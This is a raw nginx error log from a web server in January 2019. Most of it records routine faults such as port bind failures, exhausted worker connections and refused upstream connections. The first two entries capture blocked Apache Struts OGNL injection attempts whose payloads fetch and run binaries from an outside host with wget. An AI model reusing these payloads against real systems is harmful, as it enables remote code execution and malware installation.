2019/01/28 19:38:59 [error] 4777#4777: *24 access forbidden by rule, client: 142.93.174.20, server: _, request: "GET /%24%7B%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23w%3D%23ct.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%28@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27nohup%20uname%20--m%7Cgrep%20x86_64%20%3E%3E%20/dev/null%20%7C%7C%20(pkill%20loop%20%3B%20wget%20-O%20.loop%20http://111.90.141.104/d/ft32%20&&%20chmod%20777%20.loop%20&&%20./.loop)&&(pkill%20loop%20%3B%20wget%20-O%20.loop%20http://111.90.141.104/d/ft64%20&&%20chmod%20777%20.loop%20&&%20./.loop)%20%26%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action HTTP/1.1", host: "142.93.85.224:8082"
2019/01/28 19:38:59 [error] 4777#4777: *25 access forbidden by rule, client: 142.93.174.20, server: _, request: "GET /%24%7B%28%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23w%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%28@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27nohup%20uname%20--m%7Cgrep%20x86_64%20%3E%3E%20/dev/null%20%7C%7C%20(pkill%20loop%20%3B%20wget%20-O%20.loop%20http://111.90.141.104/d/ft32%20&&%20chmod%20777%20.loop%20&&%20./.loop)&&(pkill%20loop%20%3B%20wget%20-O%20.loop%20http://111.90.141.104/d/ft64%20&&%20chmod%20777%20.loop%20&&%20./.loop)%20%26%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action HTTP/1.1", host: "142.93.85.224:8082"
2019/01/28 20:14:18 [error] 4777#4777: *36 user "tim" was not found in "/etc/nginx/.htpasswd", client: 169.228.74.212, server: _, request: "GET / HTTP/1.1", host: "142.93.85.224:8082"
2019/01/28 20:20:58 [info] 13036#13036: Using 32768KiB of shared memory for push module in /etc/nginx/nginx.conf:65
2019/01/28 20:21:13 [info] 13065#13065: Using 32768KiB of shared memory for push module in /etc/nginx/nginx.conf:65
2019/01/28 20:21:13 [emerg] 13069#13069: bind() to 0.0.0.0:8083 failed (98: Address already in use)
2019/01/28 20:21:13 [emerg] 13069#13069: bind() to 0.0.0.0:8083 failed (98: Address already in use)
2019/01/28 20:21:13 [emerg] 13069#13069: bind() to 0.0.0.0:8083 failed (98: Address already in use)
2019/01/28 20:21:13 [emerg] 13069#13069: bind() to 0.0.0.0:8083 failed (98: Address already in use)
2019/01/28 20:21:13 [emerg] 13069#13069: bind() to 0.0.0.0:8083 failed (98: Address already in use)
2019/01/28 20:21:13 [emerg] 13069#13069: still could not bind()
2019/01/28 20:23:14 [info] 13112#13112: Using 32768KiB of shared memory for push module in /etc/nginx/nginx.conf:65
2019/01/28 20:27:54 [info] 13205#13205: Using 32768KiB of shared memory for push module in /etc/nginx/nginx.conf:65
2019/01/28 20:28:39 [alert] 13213#13213: 768 worker_connections are not enough
2019/01/28 20:28:39 [error] 13213#13213: *761 recv() failed (104: Connection reset by peer) while reading response header from upstream, client: 127.0.0.1, server: _, request: "GET / HTTP/1.1", upstream: "http://127.0.0.1:8083/", host: "142.93.85.224"
2019/01/28 20:28:40 [alert] 13213#13213: 768 worker_connections are not enough
2019/01/28 20:28:40 [error] 13213#13213: *1522 recv() failed (104: Connection reset by peer) while reading response header from upstream, client: 127.0.0.1, server: _, request: "GET /favicon.ico HTTP/1.1", upstream: "http://127.0.0.1:8083/favicon.ico", host: "142.93.85.224", referrer: "http://142.93.85.224:8083/"
2019/01/28 20:28:40 [alert] 13213#13213: 768 worker_connections are not enough
2019/01/28 20:28:40 [error] 13213#13213: *2284 recv() failed (104: Connection reset by peer) while reading response header from upstream, client: 127.0.0.1, server: _, request: "GET / HTTP/1.1", upstream: "http://127.0.0.1:8083/", host: "142.93.85.224"
2019/01/28 20:28:41 [alert] 13213#13213: 768 worker_connections are not enough
2019/01/28 20:28:41 [error] 13213#13213: *3045 recv() failed (104: Connection reset by peer) while reading response header from upstream, client: 127.0.0.1, server: _, request: "GET /favicon.ico HTTP/1.1", upstream: "http://127.0.0.1:8083/favicon.ico", host: "142.93.85.224", referrer: "http://142.93.85.224:8083/"
2019/01/28 20:28:41 [alert] 13213#13213: 768 worker_connections are not enough
2019/01/28 20:28:41 [error] 13213#13213: *3806 recv() failed (104: Connection reset by peer) while reading response header from upstream, client: 127.0.0.1, server: _, request: "GET / HTTP/1.1", upstream: "http://127.0.0.1:8083/", host: "142.93.85.224"
2019/01/28 20:28:42 [alert] 13213#13213: 768 worker_connections are not enough
2019/01/28 20:28:42 [error] 13213#13213: *4567 recv() failed (104: Connection reset by peer) while reading response header from upstream, client: 127.0.0.1, server: _, request: "GET /favicon.ico HTTP/1.1", upstream: "http://127.0.0.1:8083/favicon.ico", host: "142.93.85.224", referrer: "http://142.93.85.224:8083/"
2019/01/28 20:28:45 [alert] 13213#13213: 768 worker_connections are not enough
2019/01/28 20:28:45 [error] 13213#13213: *5328 recv() failed (104: Connection reset by peer) while reading response header from upstream, client: 127.0.0.1, server: _, request: "GET / HTTP/1.1", upstream: "http://127.0.0.1:8083/", host: "142.93.85.224"
2019/01/28 20:28:45 [alert] 13213#13213: 768 worker_connections are not enough
2019/01/28 20:28:45 [error] 13213#13213: *6089 recv() failed (104: Connection reset by peer) while reading response header from upstream, client: 127.0.0.1, server: _, request: "GET /favicon.ico HTTP/1.1", upstream: "http://127.0.0.1:8083/favicon.ico", host: "142.93.85.224", referrer: "http://142.93.85.224:8083/"
2019/01/28 20:29:28 [alert] 13213#13213: 768 worker_connections are not enough
2019/01/28 20:29:28 [error] 13213#13213: *6850 recv() failed (104: Connection reset by peer) while reading response header from upstream, client: 127.0.0.1, server: _, request: "GET / HTTP/1.1", upstream: "http://127.0.0.1:8083/", host: "142.93.85.224"
2019/01/28 20:29:29 [alert] 13213#13213: 768 worker_connections are not enough
2019/01/28 20:29:29 [error] 13213#13213: *7611 recv() failed (104: Connection reset by peer) while reading response header from upstream, client: 127.0.0.1, server: _, request: "GET /favicon.ico HTTP/1.1", upstream: "http://127.0.0.1:8083/favicon.ico", host: "142.93.85.224", referrer: "http://142.93.85.224:8083/"
2019/01/28 20:30:00 [info] 13283#13283: Using 32768KiB of shared memory for push module in /etc/nginx/nginx.conf:65
2019/01/28 20:35:32 [error] 13290#13290: *4 connect() failed (111: Connection refused) while connecting to upstream, client: 169.228.76.135, server: _, request: "GET / HTTP/1.1", upstream: "http://127.0.0.1:5000/", host: "142.93.85.224:8083"
2019/01/28 20:35:33 [error] 13290#13290: *4 connect() failed (111: Connection refused) while connecting to upstream, client: 169.228.76.135, server: _, request: "GET /favicon.ico HTTP/1.1", upstream: "http://127.0.0.1:5000/favicon.ico", host: "142.93.85.224:8083", referrer: "http://142.93.85.224:8083/"
2019/01/28 21:05:15 [error] 13290#13290: *7 connect() failed (111: Connection refused) while connecting to upstream, client: 169.228.76.135, server: _, request: "GET / HTTP/1.1", upstream: "http://127.0.0.1:5000/", host: "142.93.85.224:8083"
2019/01/28 21:05:15 [error] 13290#13290: *7 connect() failed (111: Connection refused) while connecting to upstream, client: 169.228.76.135, server: _, request: "GET /favicon.ico HTTP/1.1", upstream: "http://127.0.0.1:5000/favicon.ico", host: "142.93.85.224:8083", referrer: "http://142.93.85.224:8083/"
2019/01/28 21:05:17 [error] 13290#13290: *7 connect() failed (111: Connection refused) while connecting to upstream, client: 169.228.76.135, server: _, request: "GET / HTTP/1.1", upstream: "http://127.0.0.1:5000/", host: "142.93.85.224:8083"
2019/01/28 21:05:17 [error] 13290#13290: *7 connect() failed (111: Connection refused) while connecting to upstream, client: 169.228.76.135, server: _, request: "GET /favicon.ico HTTP/1.1", upstream: "http://127.0.0.1:5000/favicon.ico", host: "142.93.85.224:8083", referrer: "http://142.93.85.224:8083/"
2019/01/28 21:08:02 [error] 13290#13290: *15 connect() failed (111: Connection refused) while connecting to upstream, client: 169.228.76.135, server: _, request: "GET / HTTP/1.1", upstream: "http://127.0.0.1:5000/", host: "142.93.85.224:8083"
2019/01/28 21:08:03 [error] 13290#13290: *15 connect() failed (111: Connection refused) while connecting to upstream, client: 169.228.76.135, server: _, request: "GET /favicon.ico HTTP/1.1", upstream: "http://127.0.0.1:5000/favicon.ico", host: "142.93.85.224:8083", referrer: "http://142.93.85.224:8083/"
2019/01/28 21:08:38 [error] 13290#13290: *15 connect() failed (111: Connection refused) while connecting to upstream, client: 169.228.76.135, server: _, request: "GET / HTTP/1.1", upstream: "http://127.0.0.1:5000/", host: "142.93.85.224:8083"
2019/01/28 21:08:38 [error] 13290#13290: *15 connect() failed (111: Connection refused) while connecting to upstream, client: 169.228.76.135, server: _, request: "GET /favicon.ico HTTP/1.1", upstream: "http://127.0.0.1:5000/favicon.ico", host: "142.93.85.224:8083", referrer: "http://142.93.85.224:8083/"
2019/01/28 21:10:25 [error] 13290#13290: *22 connect() failed (111: Connection refused) while connecting to upstream, client: 169.228.76.135, server: _, request: "GET / HTTP/1.1", upstream: "http://127.0.0.1:5000/", host: "142.93.85.224:8083"
2019/01/28 21:10:25 [error] 13290#13290: *22 connect() failed (111: Connection refused) while connecting to upstream, client: 169.228.76.135, server: _, request: "GET /favicon.ico HTTP/1.1", upstream: "http://127.0.0.1:5000/favicon.ico", host: "142.93.85.224:8083", referrer: "http://142.93.85.224:8083/"
2019/01/28 21:12:06 [error] 13290#13290: *25 connect() failed (111: Connection refused) while connecting to upstream, client: 169.228.76.135, server: _, request: "GET / HTTP/1.1", upstream: "http://127.0.0.1:5000/", host: "142.93.85.224:8083"
2019/01/28 21:12:06 [error] 13290#13290: *25 connect() failed (111: Connection refused) while connecting to upstream, client: 169.228.76.135, server: _, request: "GET /favicon.ico HTTP/1.1", upstream: "http://127.0.0.1:5000/favicon.ico", host: "142.93.85.224:8083", referrer: "http://142.93.85.224:8083/"
2019/01/28 21:12:13 [error] 13290#13290: *25 connect() failed (111: Connection refused) while connecting to upstream, client: 169.228.76.135, server: _, request: "GET /favicon.ico HTTP/1.1", upstream: "http://127.0.0.1:5000/favicon.ico", host: "142.93.85.224:8083", referrer: "http://142.93.85.224:8083/"
2019/01/28 21:12:43 [error] 13290#13290: *25 connect() failed (111: Connection refused) while connecting to upstream, client: 169.228.76.135, server: _, request: "GET / HTTP/1.1", upstream: "http://127.0.0.1:5000/", host: "142.93.85.224:8083"
2019/01/28 21:12:44 [error] 13290#13290: *25 connect() failed (111: Connection refused) while connecting to upstream, client: 169.228.76.135, server: _, request: "GET /favicon.ico HTTP/1.1", upstream: "http://127.0.0.1:5000/favicon.ico", host: "142.93.85.224:8083", referrer: "http://142.93.85.224:8083/"
2019/01/28 21:12:44 [error] 13290#13290: *25 connect() failed (111: Connection refused) while connecting to upstream, client: 169.228.76.135, server: _, request: "GET / HTTP/1.1", upstream: "http://127.0.0.1:5000/", host: "142.93.85.224:8083"
2019/01/28 21:12:44 [error] 13290#13290: *25 connect() failed (111: Connection refused) while connecting to upstream, client: 169.228.76.135, server: _, request: "GET /favicon.ico HTTP/1.1", upstream: "http://127.0.0.1:5000/favicon.ico", host: "142.93.85.224:8083", referrer: "http://142.93.85.224:8083/"
2019/01/28 21:12:59 [error] 13290#13290: *35 connect() failed (111: Connection refused) while connecting to upstream, client: 169.228.76.135, server: _, request: "GET / HTTP/1.1", upstream: "http://127.0.0.1:5000/", host: "142.93.85.224:8083"
2019/01/28 21:13:00 [error] 13290#13290: *35 connect() failed (111: Connection refused) while connecting to upstream, client: 169.228.76.135, server: _, request: "GET /favicon.ico HTTP/1.1", upstream: "http://127.0.0.1:5000/favicon.ico", host: "142.93.85.224:8083", referrer: "http://142.93.85.224:8083/"
2019/01/28 21:13:00 [error] 13290#13290: *35 connect() failed (111: Connection refused) while connecting to upstream, client: 169.228.76.135, server: _, request: "GET / HTTP/1.1", upstream: "http://127.0.0.1:5000/", host: "142.93.85.224:8083"
2019/01/28 21:13:00 [error] 13290#13290: *35 connect() failed (111: Connection refused) while connecting to upstream, client: 169.228.76.135, server: _, request: "GET /favicon.ico HTTP/1.1", upstream: "http://127.0.0.1:5000/favicon.ico", host: "142.93.85.224:8083", referrer: "http://142.93.85.224:8083/"
2019/01/28 21:13:01 [error] 13290#13290: *35 connect() failed (111: Connection refused) while connecting to upstream, client: 169.228.76.135, server: _, request: "GET / HTTP/1.1", upstream: "http://127.0.0.1:5000/", host: "142.93.85.224:8083"
2019/01/28 21:13:01 [error] 13290#13290: *35 connect() failed (111: Connection refused) while connecting to upstream, client: 169.228.76.135, server: _, request: "GET /favicon.ico HTTP/1.1", upstream: "http://127.0.0.1:5000/favicon.ico", host: "142.93.85.224:8083", referrer: "http://142.93.85.224:8083/"
2019/01/28 21:13:35 [error] 13290#13290: *25 connect() failed (111: Connection refused) while connecting to upstream, client: 169.228.76.135, server: _, request: "GET / HTTP/1.1", upstream: "http://127.0.0.1:5000/", host: "142.93.85.224:8083"
2019/01/28 21:13:36 [error] 13290#13290: *25 connect() failed (111: Connection refused) while connecting to upstream, client: 169.228.76.135, server: _, request: "GET /favicon.ico HTTP/1.1", upstream: "http://127.0.0.1:5000/favicon.ico", host: "142.93.85.224:8083", referrer: "http://142.93.85.224:8083/"
2019/01/28 21:14:51 [info] 15094#15094: Using 32768KiB of shared memory for push module in /etc/nginx/nginx.conf:65
2019/01/28 21:14:53 [error] 15102#15102: *1 access forbidden by rule, client: 169.228.76.135, server: _, request: "GET /.htaccess HTTP/1.1", host: "142.93.85.224:8083"
2019/01/28 21:14:54 [error] 15102#15102: *1 access forbidden by rule, client: 169.228.76.135, server: _, request: "GET /.htaccess HTTP/1.1", host: "142.93.85.224:8083"
2019/01/28 21:15:26 [info] 15189#15189: Using 32768KiB of shared memory for push module in /etc/nginx/nginx.conf:65
2019/01/28 21:15:28 [error] 15196#15196: *1 access forbidden by rule, client: 169.228.76.135, server: _, request: "GET /.htaccess HTTP/1.1", host: "142.93.85.224:8083"
2019/01/28 21:15:30 [error] 15196#15196: *3 access forbidden by rule, client: 169.228.76.135, server: _, request: "GET /.htaccess HTTP/1.1", host: "142.93.85.224:8083"
